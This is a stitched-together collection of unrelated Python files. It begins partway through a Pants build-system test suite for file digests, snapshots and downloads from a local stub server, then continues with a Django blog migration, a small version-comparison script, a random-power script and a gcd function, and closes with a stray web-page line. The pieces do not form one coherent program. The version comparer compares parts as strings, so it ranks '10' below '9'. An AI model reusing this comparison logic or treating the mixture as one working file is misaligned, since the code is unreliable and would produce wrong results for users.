assert snapshots[0].digest == ROLAND_DIGEST
assert snapshots[1].files == ("susannah",)
assert snapshots[1].digest == Digest(
"d3539cfc21eb4bab328ca9173144a8e932c515b1b9e26695454eeedbc5a95f6f", 82
)
assert snapshots[2] == EMPTY_SNAPSHOT
def test_snapshot_from_outside_buildroot_failure(rule_runner: RuleRunner) -> None:
with temporary_dir() as temp_dir:
with pytest.raises(Exception) as exc:
rule_runner.scheduler.capture_snapshots(
[PathGlobsAndRoot(PathGlobs(["*"]), os.path.join(temp_dir, "doesnotexist"))]
)
assert "doesnotexist" in str(exc.value)
# -----------------------------------------------------------------------------------------------
# `CreateDigest`
# -----------------------------------------------------------------------------------------------
def test_create_empty_directory(rule_runner: RuleRunner) -> None:
res = rule_runner.request(Snapshot, [CreateDigest([Directory("a/")])])
assert res.dirs == ("a",)
assert not res.files
assert res.digest != EMPTY_DIGEST
res = rule_runner.request(
Snapshot, [CreateDigest([Directory("x/y/z"), Directory("m"), Directory("m/n")])]
)
assert res.dirs == ("m", "m/n", "x", "x/y", "x/y/z")
assert not res.files
assert res.digest != EMPTY_DIGEST
def test_create_digest_with_file_entries(rule_runner: RuleRunner) -> None:
# Retrieve some known FileEntry's from the test tar.
setup_fs_test_tar(rule_runner)
file_entries = rule_runner.request(DigestEntries, [PathGlobs(["4.txt", "a/4.txt.ln"])])
# Make a snapshot with just those files.
snapshot = rule_runner.request(Snapshot, [CreateDigest(file_entries)])
assert snapshot.dirs == ("a",)
assert snapshot.files == ("4.txt", "a/4.txt.ln")
assert snapshot.digest != EMPTY_DIGEST
# -----------------------------------------------------------------------------------------------
# `MergeDigests`
# -----------------------------------------------------------------------------------------------
def test_merge_digests(rule_runner: RuleRunner) -> None:
with temporary_dir() as temp_dir:
Path(temp_dir, "roland").write_text("European Burmese")
Path(temp_dir, "susannah").write_text("Not sure actually")
(
empty_snapshot,
roland_snapshot,
susannah_snapshot,
both_snapshot,
) = rule_runner.scheduler.capture_snapshots(
(
PathGlobsAndRoot(PathGlobs(["doesnotmatch"]), temp_dir),
PathGlobsAndRoot(PathGlobs(["roland"]), temp_dir),
PathGlobsAndRoot(PathGlobs(["susannah"]), temp_dir),
PathGlobsAndRoot(PathGlobs(["*"]), temp_dir),
)
)
empty_merged = rule_runner.request(Digest, [MergeDigests((empty_snapshot.digest,))])
assert empty_snapshot.digest == empty_merged
roland_merged = rule_runner.request(
Digest, [MergeDigests((roland_snapshot.digest, empty_snapshot.digest))]
)
assert roland_snapshot.digest == roland_merged
both_merged = rule_runner.request(
Digest, [MergeDigests((roland_snapshot.digest, susannah_snapshot.digest))]
)
assert both_snapshot.digest == both_merged
# -----------------------------------------------------------------------------------------------
# `DigestSubset`
# -----------------------------------------------------------------------------------------------
def generate_original_digest(rule_runner: RuleRunner) -> Digest:
files = [
FileContent(path, b"dummy content")
for path in [
"a.txt",
"b.txt",
"c.txt",
"subdir/a.txt",
"subdir/b.txt",
"subdir2/a.txt",
"subdir2/nested_subdir/x.txt",
]
]
return rule_runner.request(
Digest,
[CreateDigest(files)],
)
def test_digest_subset_empty(rule_runner: RuleRunner) -> None:
subset_snapshot = rule_runner.request(
Snapshot, [DigestSubset(generate_original_digest(rule_runner), PathGlobs(()))]
)
assert subset_snapshot.digest == EMPTY_DIGEST
assert subset_snapshot.files == ()
assert subset_snapshot.dirs == ()
def test_digest_subset_globs(rule_runner: RuleRunner) -> None:
subset_snapshot = rule_runner.request(
Snapshot,
[
DigestSubset(
generate_original_digest(rule_runner),
PathGlobs(("a.txt", "c.txt", "subdir2/**")),
)
],
)
assert set(subset_snapshot.files) == {
"a.txt",
"c.txt",
"subdir2/a.txt",
"subdir2/nested_subdir/x.txt",
}
assert set(subset_snapshot.dirs) == {"subdir2", "subdir2/nested_subdir"}
expected_files = [
FileContent(path, b"dummy content")
for path in [
"a.txt",
"c.txt",
"subdir2/a.txt",
"subdir2/nested_subdir/x.txt",
]
]
subset_digest = rule_runner.request(Digest, [CreateDigest(expected_files)])
assert subset_snapshot.digest == subset_digest
def test_digest_subset_globs_2(rule_runner: RuleRunner) -> None:
subset_snapshot = rule_runner.request(
Snapshot,
[
DigestSubset(
generate_original_digest(rule_runner), PathGlobs(("a.txt", "c.txt", "subdir2/*"))
)
],
)
assert set(subset_snapshot.files) == {"a.txt", "c.txt", "subdir2/a.txt"}
assert set(subset_snapshot.dirs) == {"subdir2", "subdir2/nested_subdir"}
def test_digest_subset_nonexistent_filename_globs(rule_runner: RuleRunner) -> None:
# We behave according to the `GlobMatchErrorBehavior`.
original_digest = generate_original_digest(rule_runner)
globs = ["some_file_not_in_snapshot.txt", "a.txt"]
subset_snapshot = rule_runner.request(
Snapshot, [DigestSubset(original_digest, PathGlobs(globs))]
)
assert set(subset_snapshot.files) == {"a.txt"}
expected_digest = rule_runner.request(
Digest, [CreateDigest([FileContent("a.txt", b"dummy content")])]
)
assert subset_snapshot.digest == expected_digest
# TODO: Fix this to actually error.
# with pytest.raises(ExecutionError):
# rule_runner.request(
# Snapshot,
# [
# DigestSubset(
# original_digest,
# PathGlobs(
# globs,
# glob_match_error_behavior=GlobMatchErrorBehavior.error,
# conjunction=GlobExpansionConjunction.all_match,
# description_of_origin="test",
# ),
# )
# ],
# )
# -----------------------------------------------------------------------------------------------
# `Digest` -> `Snapshot`
# -----------------------------------------------------------------------------------------------
def test_lift_digest_to_snapshot(rule_runner: RuleRunner) -> None:
prime_store_with_roland_digest(rule_runner)
snapshot = rule_runner.request(Snapshot, [ROLAND_DIGEST])
assert snapshot.files == ("roland",)
assert snapshot.digest == ROLAND_DIGEST
def test_error_lifting_file_digest_to_snapshot(rule_runner: RuleRunner) -> None:
prime_store_with_roland_digest(rule_runner)
# A file digest is not a directory digest. Here, we hash the file that was primed as part of
# that directory, and show that we can't turn it into a Snapshot.
text = b"European Burmese"
hasher = hashlib.sha256()
hasher.update(text)
digest = Digest(fingerprint=hasher.hexdigest(), serialized_bytes_length=len(text))
with pytest.raises(ExecutionError) as exc:
rule_runner.request(Snapshot, [digest])
assert "unknown directory" in str(exc.value)
# -----------------------------------------------------------------------------------------------
# `AddPrefix` and `RemovePrefix`
# -----------------------------------------------------------------------------------------------
def test_add_prefix(rule_runner: RuleRunner) -> None:
digest = rule_runner.request(
Digest,
[CreateDigest([FileContent("main.ext", b""), FileContent("subdir/sub.ext", b"")])],
)
# Two components.
output_digest = rule_runner.request(Digest, [AddPrefix(digest, "outer_dir/middle_dir")])
snapshot = rule_runner.request(Snapshot, [output_digest])
assert sorted(snapshot.files) == [
"outer_dir/middle_dir/main.ext",
"outer_dir/middle_dir/subdir/sub.ext",
]
assert sorted(snapshot.dirs) == [
"outer_dir",
"outer_dir/middle_dir",
"outer_dir/middle_dir/subdir",
]
# Empty.
output_digest = rule_runner.request(Digest, [AddPrefix(digest, "")])
assert digest == output_digest
# Illegal.
with pytest.raises(Exception, match=r"The `prefix` must be relative."):
rule_runner.request(Digest, [AddPrefix(digest, "../something")])
def test_remove_prefix(rule_runner: RuleRunner) -> None:
relevant_files = (
"characters/dark_tower/roland",
"characters/dark_tower/susannah",
)
all_files = (
"books/dark_tower/gunslinger",
"characters/altered_carbon/kovacs",
*relevant_files,
"index",
)
with temporary_dir() as temp_dir:
safe_file_dump(os.path.join(temp_dir, "index"), "books\ncharacters\n")
safe_file_dump(
os.path.join(temp_dir, "characters", "altered_carbon", "kovacs"),
"Envoy",
makedirs=True,
)
tower_dir = os.path.join(temp_dir, "characters", "dark_tower")
safe_file_dump(os.path.join(tower_dir, "roland"), "European Burmese", makedirs=True)
safe_file_dump(os.path.join(tower_dir, "susannah"), "Not sure actually", makedirs=True)
safe_file_dump(
os.path.join(temp_dir, "books", "dark_tower", "gunslinger"),
"1982",
makedirs=True,
)
snapshot, snapshot_with_extra_files = rule_runner.scheduler.capture_snapshots(
[
PathGlobsAndRoot(PathGlobs(["characters/dark_tower/*"]), temp_dir),
PathGlobsAndRoot(PathGlobs(["**"]), temp_dir),
]
)
# Check that we got the full snapshots that we expect
assert snapshot.files == relevant_files
assert snapshot_with_extra_files.files == all_files
# Strip empty prefix:
zero_prefix_stripped_digest = rule_runner.request(
Digest, [RemovePrefix(snapshot.digest, "")]
)
assert snapshot.digest == zero_prefix_stripped_digest
# Strip a non-empty prefix shared by all files:
stripped_digest = rule_runner.request(
Digest, [RemovePrefix(snapshot.digest, "characters/dark_tower")]
)
assert stripped_digest == Digest(
fingerprint="71e788fc25783c424db555477071f5e476d942fc958a5d06ffc1ed223f779a8c",
serialized_bytes_length=162,
)
expected_snapshot = assert_single_element(
rule_runner.scheduler.capture_snapshots([PathGlobsAndRoot(PathGlobs(["*"]), tower_dir)])
)
assert expected_snapshot.files == ("roland", "susannah")
assert stripped_digest == expected_snapshot.digest
# Try to strip a prefix which isn't shared by all files:
with pytest.raises(Exception) as exc:
rule_runner.request(
Digest,
[RemovePrefix(snapshot_with_extra_files.digest, "characters/dark_tower")],
)
assert (
"Cannot strip prefix characters/dark_tower from root directory (Digest "
"with hash Fingerprint<28c47f77867f0c8d577d2ada2f06b03fc8e5ef2d780e8942713b26c5e3f434b8>)"
" - root directory contained non-matching directory named: books and file named: index"
) in str(exc.value)
# -----------------------------------------------------------------------------------------------
# `DownloadFile`
# -----------------------------------------------------------------------------------------------
@pytest.fixture
def downloads_rule_runner() -> RuleRunner:
return RuleRunner(rules=[QueryRule(Snapshot, [DownloadFile])], isolated_local_store=True)
class StubHandler(BaseHTTPRequestHandler):
response_text = b"Hello, client!"
def do_HEAD(self):
self.send_headers()
def do_GET(self):
self.send_headers()
self.wfile.write(self.response_text)
def send_headers(self):
code = 200 if self.path == "/file.txt" else 404
self.send_response(code)
self.send_header("Content-Type", "text/utf-8")
self.send_header("Content-Length", f"{len(self.response_text)}")
self.end_headers()
def stub_erroring_handler(error_count_value: int) -> type[BaseHTTPRequestHandler]:
"""Return a handler that errors once mid-download before succeeding for the next GET.
This function returns an anonymous class so that each call can create a new instance with its
own error counter.
"""
error_num = 1
class StubErroringHandler(BaseHTTPRequestHandler):
error_count = error_count_value
response_text = b"Hello, client!"
def do_HEAD(self):
self.send_headers()
def do_GET(self):
self.send_headers()
nonlocal error_num
if error_num <= self.error_count:
msg = f"Returning error {error_num}"
error_num += 1
raise Exception(msg)
self.wfile.write(self.response_text)
def send_headers(self):
code = 200 if self.path == "/file.txt" else 404
self.send_response(code)
self.send_header("Content-Type", "text/utf-8")
self.send_header("Content-Length", f"{len(self.response_text)}")
self.end_headers()
return StubErroringHandler
DOWNLOADS_FILE_DIGEST = FileDigest(
"8fcbc50cda241aee7238c71e87c27804e7abc60675974eaf6567aa16366bc105", 14
)
DOWNLOADS_EXPECTED_DIRECTORY_DIGEST = Digest(
"4c9cf91fcd7ba1abbf7f9a0a1c8175556a82bee6a398e34db3284525ac24a3ad", 84
)
ROLAND_DOWNLOAD_DIGEST = Digest(
"9341f76bef74170bedffe51e4f2e233f61786b7752d21c2339f8ee6070eba819", 82
)
def test_download_valid(downloads_rule_runner: RuleRunner) -> None:
with http_server(StubHandler) as port:
snapshot = downloads_rule_runner.request(
Snapshot, [DownloadFile(f"http://localhost:{port}/file.txt", DOWNLOADS_FILE_DIGEST)]
)
assert snapshot.files == ("file.txt",)
assert snapshot.digest == DOWNLOADS_EXPECTED_DIRECTORY_DIGEST
def test_download_missing_file(downloads_rule_runner: RuleRunner) -> None:
with pytest.raises(ExecutionError) as exc:
with http_server(StubHandler) as port:
downloads_rule_runner.request(
Snapshot, [DownloadFile(f"http://localhost:{port}/notfound", DOWNLOADS_FILE_DIGEST)]
)
assert "404" in str(exc.value)
def test_download_body_error_retry(downloads_rule_runner: RuleRunner) -> None:
with http_server(stub_erroring_handler(1)) as port:
snapshot = downloads_rule_runner.request(
Snapshot, [DownloadFile(f"http://localhost:{port}/file.txt", DOWNLOADS_FILE_DIGEST)]
)
assert snapshot.files == ("file.txt",)
assert snapshot.digest == DOWNLOADS_EXPECTED_DIRECTORY_DIGEST
def test_download_body_error_retry_eventually_fails(downloads_rule_runner: RuleRunner) -> None:
# Returns one more error than the retry will allow.
with http_server(stub_erroring_handler(5)) as port:
with pytest.raises(Exception):
_ = downloads_rule_runner.request(
Snapshot, [DownloadFile(f"http://localhost:{port}/file.txt", DOWNLOADS_FILE_DIGEST)]
)
def test_download_wrong_digest(downloads_rule_runner: RuleRunner) -> None:
file_digest = FileDigest(
DOWNLOADS_FILE_DIGEST.fingerprint, DOWNLOADS_FILE_DIGEST.serialized_bytes_length + 1
)
with pytest.raises(ExecutionError) as exc:
with http_server(StubHandler) as port:
downloads_rule_runner.request(
Snapshot, [DownloadFile(f"http://localhost:{port}/file.txt", file_digest)]
)
assert "wrong digest" in str(exc.value).lower()
def test_download_file(downloads_rule_runner: RuleRunner) -> None:
with temporary_dir() as temp_dir:
roland = Path(temp_dir, "roland")
roland.write_text("European Burmese")
snapshot = downloads_rule_runner.request(
Snapshot,
[DownloadFile(f"file:{roland}", ROLAND_FILE_DIGEST)],
)
assert snapshot.files == ("roland",)
assert snapshot.digest == ROLAND_DOWNLOAD_DIGEST
def test_download_caches(downloads_rule_runner: RuleRunner) -> None:
# We put the expected content in the store, but because we have never fetched it from this
# URL, we confirm the URL and attempt to refetch. Once it is cached, it does not need to be
# refetched.
prime_store_with_roland_digest(downloads_rule_runner)
with temporary_dir() as temp_dir:
roland = Path(temp_dir, "roland")
roland.write_text("European Burmese")
snapshot = downloads_rule_runner.request(
Snapshot,
[DownloadFile(f"file:{roland}", ROLAND_FILE_DIGEST)],
)
assert snapshot.files == ("roland",)
assert snapshot.digest == ROLAND_DOWNLOAD_DIGEST
def test_download_https() -> None:
# This also tests that the custom certs functionality works.
with temporary_dir() as temp_dir:
def write_resource(name: str) -> Path:
path = Path(temp_dir) / name
data = pkgutil.get_data("pants.engine.internals", f"fs_test_data/tls/rsa/{name}")
assert data is not None
path.write_bytes(data)
return path
server_cert = write_resource("server.crt")
server_key = write_resource("server.key")
cert_chain = write_resource("server.chain")
rule_runner = RuleRunner(
rules=[QueryRule(Snapshot, [DownloadFile])],
isolated_local_store=True,
ca_certs_path=str(cert_chain),
)
ssl_context = ssl.SSLContext()
ssl_context.load_cert_chain(certfile=str(server_cert), keyfile=str(server_key))
with http_server(StubHandler, ssl_context=ssl_context) as port:
snapshot = rule_runner.request(
Snapshot,
[DownloadFile(f"https://localhost:{port}/file.txt", DOWNLOADS_FILE_DIGEST)],
)
assert snapshot.files == ("file.txt",)
assert snapshot.digest == DOWNLOADS_EXPECTED_DIRECTORY_DIGEST
# -----------------------------------------------------------------------------------------------
# `Workspace` and `.write_digest()`
# -----------------------------------------------------------------------------------------------
def test_write_digest_scheduler(rule_runner: RuleRunner) -> None:
prime_store_with_roland_digest(rule_runner)
path = Path(rule_runner.build_root, "roland")
assert not path.is_file()
rule_runner.scheduler.write_digest(ROLAND_DIGEST)
assert path.is_file()
assert path.read_text() == "European Burmese"
rule_runner.scheduler.write_digest(ROLAND_DIGEST, path_prefix="test/")
path = Path(rule_runner.build_root, "test/roland")
assert path.is_file()
assert path.read_text() == "European Burmese"
def test_write_digest_workspace(rule_runner: RuleRunner) -> None:
workspace = Workspace(rule_runner.scheduler, _enforce_effects=False)
digest = rule_runner.request(
Digest,
[CreateDigest([FileContent("a.txt", b"hello"), FileContent("subdir/b.txt", b"goodbye")])],
)
path1 = Path(rule_runner.build_root, "a.txt")
path2 = Path(rule_runner.build_root, "subdir/b.txt")
assert not path1.is_file()
assert not path2.is_file()
workspace.write_digest(digest)
assert path1.is_file()
assert path2.is_file()
assert path1.read_text() == "hello"
assert path2.read_text() == "goodbye"
workspace.write_digest(digest, path_prefix="prefix")
path1 = Path(rule_runner.build_root, "prefix/a.txt")
path2 = Path(rule_runner.build_root, "prefix/subdir/b.txt")
assert path1.is_file()
assert path2.is_file()
assert path1.read_text() == "hello"
assert path2.read_text() == "goodbye"
def test_write_digest_workspace_clear_paths(rule_runner: RuleRunner) -> None:
workspace = Workspace(rule_runner.scheduler, _enforce_effects=False)
digest_a = rule_runner.request(
Digest,
[CreateDigest([FileContent("newdir/a.txt", b"hello")])],
)
digest_b = rule_runner.request(
Digest,
[CreateDigest([FileContent("newdir/b.txt", b"goodbye")])],
)
digest_c = rule_runner.request(
Digest,
[CreateDigest([FileContent("newdir/c.txt", b"hello again")])],
)
digest_c_root = rule_runner.request(
Digest, [CreateDigest([FileContent("c.txt", b"hello again")])]
)
digest_d = rule_runner.request(
Digest, [CreateDigest([SymlinkEntry("newdir/d.txt", "newdir/a.txt")])]
)
all_paths = {name: Path(rule_runner.build_root, f"newdir/{name}.txt") for name in "abcd"}
def check(expected_names: set[str]) -> None:
for name, path in all_paths.items():
expected = name in expected_names
assert path.exists() == expected
workspace.write_digest(digest_a, clear_paths=())
workspace.write_digest(digest_b, clear_paths=())
check({"a", "b"})
# clear a file
workspace.write_digest(digest_d, clear_paths=("newdir/b.txt",))
check({"a", "d"})
# clear a symlink (doesn't remove target file)
workspace.write_digest(digest_b, clear_paths=("newdir/d.txt",))
check({"a", "b"})
# clear a directory
workspace.write_digest(digest_c, clear_paths=("newdir",))
check({"c"})
# path prefix, and clearing the 'current' directory
workspace.write_digest(digest_c_root, path_prefix="newdir", clear_paths=("",))
check({"c"})
# clear multiple paths
workspace.write_digest(digest_b, clear_paths=())
check({"b", "c"})
workspace.write_digest(digest_a, clear_paths=("newdir/b.txt", "newdir/c.txt"))
check({"a"})
# clearing non-existent paths is fine
workspace.write_digest(
digest_b, clear_paths=("not-here", "newdir/not-here", "not-here/also-not-here")
)
check({"a", "b"})
@dataclass(frozen=True)
class DigestRequest:
create_digest: CreateDigest
class WorkspaceGoalSubsystem(GoalSubsystem):
name = "workspace-goal"
class WorkspaceGoal(Goal):
subsystem_cls = WorkspaceGoalSubsystem
environment_behavior = Goal.EnvironmentBehavior.LOCAL_ONLY
def test_workspace_in_goal_rule() -> None:
@rule
def digest_request_singleton() -> DigestRequest:
fc = FileContent(path="a.txt", content=b"hello")
return DigestRequest(CreateDigest([fc]))
@goal_rule
async def workspace_goal_rule(
console: Console, workspace: Workspace, digest_request: DigestRequest
) -> WorkspaceGoal:
snapshot = await Get(Snapshot, CreateDigest, digest_request.create_digest)
workspace.write_digest(snapshot.digest)
console.print_stdout(snapshot.files[0], end="")
return WorkspaceGoal(exit_code=0)
rule_runner = RuleRunner(rules=[workspace_goal_rule, digest_request_singleton])
result = rule_runner.run_goal_rule(WorkspaceGoal)
assert result.exit_code == 0
assert result.stdout == "a.txt"
assert Path(rule_runner.build_root, "a.txt").read_text() == "hello"
# -----------------------------------------------------------------------------------------------
# Invalidation of the FS
# -----------------------------------------------------------------------------------------------
def test_invalidated_after_rewrite(rule_runner: RuleRunner) -> None:
"""Test that updating files causes invalidation of previous operations on those files."""
setup_fs_test_tar(rule_runner)
def read_file() -> str:
digest_contents = rule_runner.request(DigestContents, [PathGlobs(["4.txt"])])
assert len(digest_contents) == 1
return digest_contents[0].content.decode()
# First read the file, which should cache it.
assert read_file() == "four\n"
new_value = "cuatro\n"
Path(rule_runner.build_root, "4.txt").write_text(new_value)
assert try_with_backoff(lambda: read_file() == new_value)
def test_invalidated_after_parent_deletion(rule_runner: RuleRunner) -> None:
"""Test that FileContent is invalidated after deleting parent directory."""
setup_fs_test_tar(rule_runner)
def read_file() -> Optional[str]:
digest_contents = rule_runner.request(DigestContents, [PathGlobs(["a/b/1.txt"])])
if not digest_contents:
return None
assert len(digest_contents) == 1
return digest_contents[0].content.decode()
# Read the original file so that we have nodes to invalidate.
assert read_file() == "one\n"
shutil.rmtree(Path(rule_runner.build_root, "a/b"))
assert try_with_backoff((lambda: read_file() is None), count=10)
def test_invalidated_after_child_deletion(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
original_snapshot = rule_runner.request(Snapshot, [PathGlobs(["a/*"])])
assert original_snapshot.files == ("a/3.txt", "a/4.txt.ln")
assert original_snapshot.dirs == ("a", "a/b")
Path(rule_runner.build_root, "a/3.txt").unlink()
def is_changed_snapshot() -> bool:
new_snapshot = rule_runner.request(Snapshot, [PathGlobs(["a/*"])])
return (
new_snapshot.digest != original_snapshot.digest
and new_snapshot.files == ("a/4.txt.ln",)
and new_snapshot.dirs == ("a", "a/b")
)
assert try_with_backoff(is_changed_snapshot)
def test_invalidated_after_new_child(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
original_snapshot = rule_runner.request(Snapshot, [PathGlobs(["a/*"])])
assert original_snapshot.files == ("a/3.txt", "a/4.txt.ln")
assert original_snapshot.dirs == ("a", "a/b")
Path(rule_runner.build_root, "a/new_file.txt").write_text("new file")
def is_changed_snapshot() -> bool:
new_snapshot = rule_runner.request(Snapshot, [PathGlobs(["a/*"])])
return (
new_snapshot.digest != original_snapshot.digest
and new_snapshot.files == ("a/3.txt", "a/4.txt.ln", "a/new_file.txt")
and new_snapshot.dirs == ("a", "a/b")
)
assert try_with_backoff(is_changed_snapshot)
# -----------------------------------------------------------------------------------------------
# Native types
# -----------------------------------------------------------------------------------------------
@pytest.mark.parametrize("digest_cls", (Digest, FileDigest))
def test_digest_properties(digest_cls: type) -> None:
digest = digest_cls("a" * 64, 1000)
assert digest.fingerprint == "a" * 64
assert digest.serialized_bytes_length == 1000
@pytest.mark.parametrize("digest_cls,cls_name", ((Digest, "Digest"), (FileDigest, "FileDigest")))
def test_digest_repr(digest_cls: type, cls_name: str) -> None:
assert str(digest_cls("a" * 64, 1)) == f"{cls_name}({repr('a' * 64)}, 1)"
@pytest.mark.parametrize("digest_cls", (Digest, FileDigest))
def test_digest_hash(digest_cls: type) -> None:
assert hash(digest_cls("a" * 64, 1)) == -6148914691236517206
assert hash(digest_cls("b" * 64, 1)) == -4919131752989213765
# Note that the size bytes is not considered in the hash.
assert hash(digest_cls("a" * 64, 1000)) == -6148914691236517206
@pytest.mark.parametrize("digest_cls", (Digest, FileDigest))
def test_digest_equality(digest_cls) -> None:
digest = digest_cls("a" * 64, 1)
assert digest == digest_cls("a" * 64, 1)
assert digest != digest_cls("a" * 64, 1000)
assert digest != digest_cls("0" * 64, 1)
with pytest.raises(TypeError):
digest < digest
def test_digest_is_not_file_digest() -> None:
assert Digest("a" * 64, 1) != FileDigest("a" * 64, 1)
def test_snapshot_properties() -> None:
snapshot = Snapshot.create_for_testing(["f.ext", "dir/f.ext"], ["dir"])
assert snapshot.digest is not None
assert snapshot.files == ("dir/f.ext", "f.ext")
assert snapshot.dirs == ("dir",)
def test_snapshot_hash_and_eq() -> None:
one = Snapshot.create_for_testing(["f.ext"], ["dir"])
two = Snapshot.create_for_testing(["f.ext"], ["dir"])
assert hash(one) == hash(two)
assert one == two
three = Snapshot.create_for_testing(["f.ext"], [])
assert hash(two) != hash(three)
assert two != three
@pytest.mark.parametrize(
"before, after, expected_diff",
[
({"pants.txt": "relaxed fit"}, {"pants.txt": "relaxed fit"}, SnapshotDiff()),
(
{"pants.txt": "relaxed fit"},
{"pants.txt": "slim fit"},
SnapshotDiff(
changed_files=("pants.txt",),
),
),
(
{
"levis/501.txt": "original",
"levis/jeans/511": "slim fit",
"wrangler/cowboy_cut.txt": "performance",
},
{},
SnapshotDiff(
our_unique_dirs=("levis", "wrangler"),
),
),
(
{
"levis/501.txt": "original",
"levis/jeans/511": "slim fit",
"levis/chinos/502": "taper fit",
"wrangler/cowboy_cut.txt": "performance",
},
{
"levis/501.txt": "slim",
"levis/jeans/511": "slim fit",
"wrangler/authentics.txt": "relaxed",
},
SnapshotDiff(
our_unique_dirs=("levis/chinos",),
our_unique_files=("wrangler/cowboy_cut.txt",),
their_unique_files=("wrangler/authentics.txt",),
changed_files=("levis/501.txt",),
),
),
# Same name, but one is a file and one is a dir
(
{"duluth/pants.txt": "5-Pocket"},
{"duluth": "DuluthFlex"},
SnapshotDiff(our_unique_dirs=("duluth",), their_unique_files=("duluth",)),
),
],
)
def test_snapshot_diff(
rule_runner: RuleRunner,
before: Dict[str, str],
after: Dict[str, str],
expected_diff: SnapshotDiff,
) -> None:
diff = SnapshotDiff.from_snapshots(
rule_runner.make_snapshot(before), rule_runner.make_snapshot(after)
)
assert diff.our_unique_files == expected_diff.our_unique_files
assert diff.our_unique_dirs == expected_diff.our_unique_dirs
assert diff.their_unique_files == expected_diff.their_unique_files
assert diff.their_unique_dirs == expected_diff.their_unique_dirs
assert diff.changed_files == expected_diff.changed_files
# test with the arguments reversed
diff = SnapshotDiff.from_snapshots(
rule_runner.make_snapshot(after), rule_runner.make_snapshot(before)
)
assert diff.our_unique_files == expected_diff.their_unique_files
assert diff.our_unique_dirs == expected_diff.their_unique_dirs
assert diff.their_unique_files == expected_diff.our_unique_files
assert diff.their_unique_dirs == expected_diff.our_unique_dirs
assert diff.changed_files == expected_diff.changed_files
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
# NB: Mark this as an explicit namespace package, so that `pants.testutil`
# can be loaded, if installed.
# (We can't rely on an implicit namespace package as pytest chooses package names based on the absence
# or presence of this file: https://docs.pytest.org/en/stable/explanation/goodpractices.html#test-package-name)
__path__ = __import__("pkgutil").extend_path(__path__, __name__)
|
# Generated by Django 2.2 on 2019-04-26 10:40
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='BlogPost',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('slug', models.SlugField()),
('body', models.TextField()),
('date_created', models.DateTimeField(auto_now_add=True)),
('thumbnail', models.ImageField(blank=True, default='de.png', upload_to='')),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-date_created'],
},
),
migrations.CreateModel(
name='BlogTag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tagname', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('date_commented', models.DateTimeField(auto_now=True)),
('blog_post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.BlogPost')),
('commenter', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='blogpost',
name='blogtag',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='blog.BlogTag'),
),
]
|
#!/usr/bin/env python
import argparse
# define interface
def cml_interface():
parser = argparse.ArgumentParser(description='compare two strings representing versions')
parser.add_argument(dest='strings', type=str, nargs='+')
return parser.parse_args()
def compare_versions(s1, s2):
l1 = s1.split('.')
l2 = s2.split('.')
for i, j in zip(l1, l2):
if i == j:
continue
elif i < j:
return '{} < {}'.format(s1, s2)
else:
return '{} > {}'.format(s1, s2)
if len(l1) < len(l2):
return '{} < {}'.format(s1, s2)
elif len(l1) > len(l2):
return '{} > {}'.format(s1, s2)
return '{} = {}'.format(s1, s2)
if __name__ == '__main__':
args = cml_interface()
s1, s2 = args.strings
print(compare_versions(s1, s2))
|
from random import *
x = randint(1,50)
print("Random first value :",x)
y = randint(2,5)
print("Random second value :",y)
print("x power y :",x**y)
|
def gcd_test_two(a, b):
if a>b:
a, b=b, a
if b%a==0:
return a
else:
return gcd_test_two(a,b%a)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.